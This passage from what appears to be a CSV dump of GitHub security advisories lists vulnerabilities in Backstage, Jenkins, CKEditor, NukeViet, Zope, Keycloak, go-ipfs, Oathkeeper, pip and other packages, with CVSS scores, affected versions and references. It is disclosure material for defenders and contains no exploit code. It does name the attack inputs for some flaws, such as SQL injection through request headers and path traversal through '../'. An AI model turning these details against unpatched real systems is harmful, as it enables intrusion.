'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/techdocs-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-pgf8-28gg-vpr6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32662'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/commit/8cefadca04cbf01d0394b0cb1983247e5f1d6208'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/releases/tag/release-2021-05-27'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T22:01:05Z', 'nvd_published_at': '2021-06-03T22:15:00Z'}" +1.4.0,GHSA-5557-j87h-cvf4,2021-05-19T18:54:36Z,2021-06-16T17:29:26Z,,['CVE-2021-21653'],Missing Authorization in jenkins xray-connector,"Jenkins Xray - Test Management for Jira Plugin 2.4.0 and earlier does not perform a permission check in an HTTP endpoint, allowing with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:xray-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21653'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2251%20(2)'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T18:54:36Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-3fx4-7f69-5mmg,2021-05-20T16:26:07Z,2021-06-23T17:14:12Z,,['CVE-2016-9123'],Integer Overflow in go-jose,go-jose before 1.0.5 suffers from a CBC-HMAC integer overflow on 32-bit architectures. An integer overflow could lead to authentication bypass for CBC-HMAC encrypted ciphertexts on 32-bit architectures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/square/go-jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-9123'}, {'type': 'WEB', 'url': 'https://github.com/square/go-jose/commit/789a4c4bd4c118f7564954f441b29c153ccd6a96'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/165170'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0009'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2016/11/03/1'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T16:26:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-rgx6-rjj4-c388,2023-09-08T21:29:03Z,2021-06-21T17:16:42Z,,['CVE-2021-33829'],Cross-site Scripting in ckeditor4,A cross-site scripting (XSS) vulnerability in the HTML Data Processor in CKEditor 4 4.14.0 through 4.16.x before 4.16.1 allows remote attackers to inject executable JavaScript code through a crafted comment because `--!>` is mishandled.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.14.0'}, {'fixed': '4.16.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33829'}, {'type': 'WEB', 'url': 'https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2021-003'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ckeditor4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T17:22:32Z', 'nvd_published_at': '2021-06-09T12:15:00Z'}" +1.4.0,GHSA-q4qv-fmwc-qxpx,2021-04-07T22:06:28Z,2021-06-22T15:24:55Z,,['CVE-2019-7726'],SQL Injection in NukeViet,"modules/banners/funcs/click.php in NukeViet before 4.3.04 has a SQL INSERT statement with raw header data from an HTTP request (e.g., Referer and User-Agent).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nukeviet/nukeviet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.04'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-7726'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/pull/2740/commits/05dfb9b4531f12944fe39556f58449b9a56241be'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/blob/4.3.04/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/blob/nukeviet4.3/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/compare/4.3.03...4.3.04'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:06:28Z', 'nvd_published_at': '2020-12-31T05:15:00Z'}" +1.4.0,GHSA-rmw5-xpg9-jr29,2022-04-27T20:30:31Z,2021-06-10T17:23:21Z,,['CVE-2020-28924'],Use of Cryptographically Weak Pseudo-Random Number Generator in Rclone,"An issue was discovered in Rclone before 1.53.3. Due to the use of a weak random number generator, the password generator has been producing weak passwords with much less entropy than advertised. The suggested passwords depend deterministically on the time the second rclone was started. This limits the entropy of the passwords enormously. These passwords are often used in the crypt backend for encryption of data. It would be possible to make a dictionary of all possible passwords with about 38 million entries per password length. This would make decryption of secret material possible with a plausible amount of effort. NOTE: all passwords generated by affected versions should be changed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/rclone/rclone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.53.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28924'}, {'type': 'WEB', 'url': 'https://github.com/rclone/rclone/issues/4783'}, {'type': 'PACKAGE', 'url': 'https://github.com/rclone/rclone'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJIFT24Q6EFXLQZ24AER2QGFFZLMIPCD/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-14'}]","{'cwe_ids': ['CWE-331', 'CWE-338'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-09T14:47:19Z', 'nvd_published_at': '2020-11-19T20:15:00Z'}" +1.4.0,GHSA-r37h-j483-cjjm,2021-06-04T18:50:20Z,2021-06-01T21:38:20Z,,['CVE-2021-33563'],Improper rate limiting in Koel,"Koel before 5.1.4 lacks login throttling, lacks a password strength policy, and shows whether a failed login attempt had a valid username. This might make brute-force attacks easier.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'phanan/koel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33563'}, {'type': 'WEB', 'url': 'https://github.com/koel/koel/releases/tag/v5.1.4'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1-other-koel/koel/'}]","{'cwe_ids': ['CWE-799', 'CWE-916'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:37:37Z', 'nvd_published_at': '2021-05-24T23:15:00Z'}" +1.4.0,GHSA-5vq5-pg3r-9ph3,2022-01-03T15:56:18Z,2021-06-10T17:22:08Z,,['CVE-2021-32674'],Path Traversal in Zope,"Zope is an open-source web application server. This advisory extends the previous advisory at https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36 with additional cases of TAL expression traversal vulnerabilities. Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use. By default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk. The problem has been fixed in Zope 5.2.1 and 4.6.1. The workaround is the same as for https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36: A site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-rpcg-f9q6-2mq6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32674'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/commit/1d897910139e2c0b11984fc9b78c1da1365bec21'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/Zope'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Zope/'}]","{'cwe_ids': ['CWE-12', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-09T21:32:39Z', 'nvd_published_at': '2021-06-08T18:15:00Z'}" +1.4.0,GHSA-7r82-7xv7-xcpj,2022-02-08T22:02:43Z,2021-06-03T23:40:23Z,,['CVE-2020-13956'],Cross-site scripting in Apache HttpClient,Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.httpcomponents:httpclient'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.httpcomponents:httpclient'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13956'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/httpcomponents-client'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r03bbc318c81be21f5c8a9b85e34f2ecc741aa804a8e43b0ef2c37749@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r043a75acdeb52b15dd5e9524cdadef4202e6a5228644206acf9363f9@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06cf3ca5c8ceb94b39cd24a73d4e96153b485a7dac88444dd876accb@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0a75b8f0f72f3e18442dc56d33f3827b905f2fe5b7ba48997436f5d1@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0bebe6f9808ac7bdf572873b4fa96a29c6398c90dab29f131f3ebffe@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r12cb62751b35bdcda0ae2a08b67877d665a1f4d41eee0fa7367169e0@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r132e4c6a560cfc519caa1aaee63bdd4036327610eadbd89f76dd5457@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2835543ef0f91adcc47da72389b816e36936f584c7be584d2314fac3@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a03dc210231d7e852ef73015f71792ac0fcaca6cccc024c522ef17d@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2dc7930b43eadc78220d269b79e13ecd387e4bee52db67b2f47d4303@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r34178ab6ef106bc940665fd3f4ba5026fac3603b3fa2aefafa0b619d@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r34efec51cb817397ccf9f86e25a75676d435ba5f83ee7b2eabdad707@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3cecd59fba74404cbf4eb430135e1080897fb376f111406a78bed13a@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f740e4c38bba1face49078aa5cbeeb558c27be601cc9712ad2dcd1e@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4850b3fbaea02fde2886e461005e4af8d37c80a48b3ce2a6edca0e30@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r549ac8c159bf0c568c19670bedeb8d7c0074beded951d34b1c1d0d05@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r55b2a1d1e9b1ec9db792b93da8f0f99a4fd5a5310b02673359d9b4d1@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b55f65c123a7481104d663a915ec45a0d103e6aaa03f42ed1c07a89@%3Cdev.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5de3d3808e7b5028df966e45115e006456c4e8931dc1e29036f17927@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5fec9c1d67f928179adf484b01e7becd7c0a6fdfe3a08f92ea743b90@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r63296c45d5d84447babaf39bd1487329d8a80d8d563e67a4b6f3d8a7@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r69a94e2f302d1b778bdfefe90fcb4b8c50b226438c3c8c1d0de85a19@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a3cda38d050ebe13c1bc9a28d0a8ec38945095d07eca49046bcb89f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d672b46622842e565e00f6ef6bef83eb55d8792aac2bee75bff9a2a@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6dab7da30f8bf075f79ee189e33b45a197502e2676481bb8787fc0d7%40%3Cdev.hc.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6eb2dae157dbc9af1f30d1f64e9c60d4ebef618f3dce4a0e32d6ea4d@%3Ccommits.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70c429923100c5a4fae8e5bc71c8a2d39af3de4888f50a0ac3755e6f@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r87ddc09295c27f25471269ad0a79433a91224045988b88f0413a97ec@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8aa1e5c343b89aec5b69961471950e862f15246cb6392910161c389b@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9e52a6c72c8365000ecd035e48cc9fee5a677a150350d4420c46443d@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra539f20ef0fb0c27ee39945b5f56bf162e5c13d1c60f7344dab8de3b@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra8bc6b61c5df301a6fe5a716315528ecd17ccb8a7f907e24a47a1a5e@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad6222134183046f3928f733bf680919e0c390739bfbfe6c90049673@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae14ae25ff4a60251e3ba2629c082c5ba3851dfd4d21218b99b56652@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb4ba262d6f08ab9cf8b1ebbcd9b00b0368ffe90dad7ad7918b4b56fc@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb725052404fabffbe093c83b2c46f3f87e12c3193a82379afbc529f8@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc0863892ccfd9fd0d0ae10091f24ee769fb39b8957fe4ebabfc11f17@%3Cdev.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc3739e0ad4bcf1888c6925233bfc37dd71156bbc8416604833095c42@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc505fee574fe8d18f9b0c655a4d120b0ae21bb6a73b96003e1d9be35@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc5c6ccb86d2afe46bbd4b71573f0448dc1f87bbcd5a0d8c7f8f904b2@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc990e2462ec32b09523deafb2c73606208599e196fa2d7f50bdbc587@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcced7ed3237c29cd19c1e9bf465d0038b8b2e967b99fc283db7ca553@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd9ad5dda60c82ab0d0c9bd3e9cb1dc740804451fc20c7f451ef5cc4@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd5ab56beb2ac6879f6ab427bc4e5f7691aed8362d17b713f61779858@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re504acd4d63b8df2a7353658f45c9a3137e5f80e41cf7de50058b2c1@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rea3dbf633dde5008d38bf6600a3738b9216e733e03f9ff7becf79625@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ree942561f4620313c75982a4e5f3b74fe6f7062b073210779648eec2@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reef569c2419705754a3acf42b5f19b2a158153cef0e448158bc54917@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf03228972e56cb4a03e6d9558188c2938078cf3ceb23a3fead87c9ca@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf43d17ed0d1fb4fb79036b582810ef60b18b1ef3add0d5dea825af1e@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf4db88c22e1be9eb60c7dc623d0528642c045fb196a24774ac2fa3a3@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf7ca60f78f05b772cc07d27e31bcd112f9910a05caf9095e38ee150f@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb35f6db9ba1f1e061b63769a4eff5abadcc254ebfefc280e5a0dcf1@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfbedcb586a1e7dfce87ee03c720e583fc2ceeafa05f35c542cecc624@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc00884c7b7ca878297bffe45fcb742c362b00b26ba37070706d44c3@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T22:25:52Z', 'nvd_published_at': '2020-12-02T17:15:00Z'}" +1.4.0,GHSA-q6w2-89hq-hq27,2022-08-11T16:52:01Z,2021-06-08T23:02:43Z,,['CVE-2021-20195'],keycloak Self Stored Cross-site Scripting vulnerability,A flaw was found in keycloak in versions before 13.0.0. A Self Stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and Javascript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '13.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20195'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/717d9515fa131e3d8c8936e41b2e52270fdec976'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1919143'}]","{'cwe_ids': ['CWE-116', 'CWE-20', 'CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T17:55:29Z', 'nvd_published_at': '2021-05-28T11:15:00Z'}" +1.4.0,GHSA-27pv-q55r-222g,2021-05-21T18:31:52Z,2021-06-23T17:27:44Z,,['CVE-2020-26279'],Path traversal in github.com/ipfs/go-ipfs,"### Impact +It is currently possible for path traversal to occur with DAGs containing relative paths during retrieval. This can cause files to be overwritten, or written to incorrect output directories. The issue can only occur when `ipfs get` is done on an affected DAG. + +1. The only affected command is `ipfs get`. +2. The gateway is not affected. + +### Patches +Traversal fix patched in https://github.com/whyrusleeping/tar-utils/commit/20a61371de5b51380bbdb0c7935b30b0625ac227 +`tar-utils` patch applied to go-ipfs via https://github.com/ipfs/go-ipfs/commit/b7ddba7fe47dee5b1760b8ffe897908417e577b2 + +### Workarounds +Upgrade to go-ipfs 0.8 or later. + +### References +Binaries for the patched versions of go-ipfs are available on the IPFS distributions site, https://dist.ipfs.io/go-ipfs + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ipfs](https://github.com/ipfs/go-ipfs) +* Email us at [security@ipfs.io](mailto:security@ipfs.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-ipfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/security/advisories/GHSA-27pv-q55r-222g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26279'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/commit/b7ddba7fe47dee5b1760b8ffe897908417e577b2'}, {'type': 'WEB', 'url': 'https://github.com/whyrusleeping/tar-utils/commit/20a61371de5b51380bbdb0c7935b30b0625ac227'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T18:31:52Z', 'nvd_published_at': None}" +1.4.0,GHSA-qvp4-rpmr-xwrr,2021-06-22T20:50:44Z,2021-06-23T18:00:20Z,,[],Possible bypass of token claim validation when OAuth2 Introspection caching is enabled,"### Impact + +When you make a request to an endpoint that requires the scope `foo` using an access token granted with that `foo` scope, introspection will be valid and that token will be cached. The problem comes when a second requests to an endpoint that requires the scope `bar` is made before the cache has expired. Whether the token is granted or not to the `bar` scope, introspection will be valid. + +### Patches + +A patch will be released with `v0.38.12-beta.1`. + +### Workarounds + +Per default, caching is disabled for the `oauth2_introspection` authenticator. When caching is disabled, this vulnerability does not exist. + +### Trace + +The cache is checked in [`func (a *AuthenticatorOAuth2Introspection) Authenticate(...)`](https://github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L152). From [`tokenFromCache()`](https://github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L97) it seems that it only validates the token expiration date, but ignores whether the token has or not the proper scopes. + +### Post-Mortem + +The vulnerability was introduced in PR #424. During review, we failed to require appropriate test coverage by the submitter which is the primary reason that the vulnerability passed the review process. + +To avoid this from happening again we enabled codecov with a strict policy on the Ory Oathkeeper repository: Without an increase in code coverage the PR can not be merged. + +To address this issue and any regressions we have added a test suite ensuring that the cache behaviour is correct in the different scenarios: + +- Scope strategy is `none`, cache is enabled, and `requested_scope` is not empty -> cache will not be used; +- Scope strategy is `none`, cache is enabled, and `requested_scope` is empty -> cache will be used; +- Scope strategy is not `none`, cache is enabled, and `requested_scope` is not empty -> cache will be used; + +as well as validating if `iss`, `aud`, `exp`, `token_use`, and scope are validated. + +Additionally, we added [CodeQL scanning](https://github.com/ory/oathkeeper/commit/64ac7562669287d391cd72dfd43c5d71ff9f89a1) to the CI.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ory/oathkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.38.0-beta.2'}, {'fixed': '0.38.12-beta.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.38.11-beta.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/ory/oathkeeper/security/advisories/GHSA-qvp4-rpmr-xwrr'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-22T20:50:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-gpvv-69j7-gwj8,2022-04-21T15:43:34Z,2021-06-09T17:35:04Z,,['CVE-2019-20916'],Path Traversal in pip,"The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ 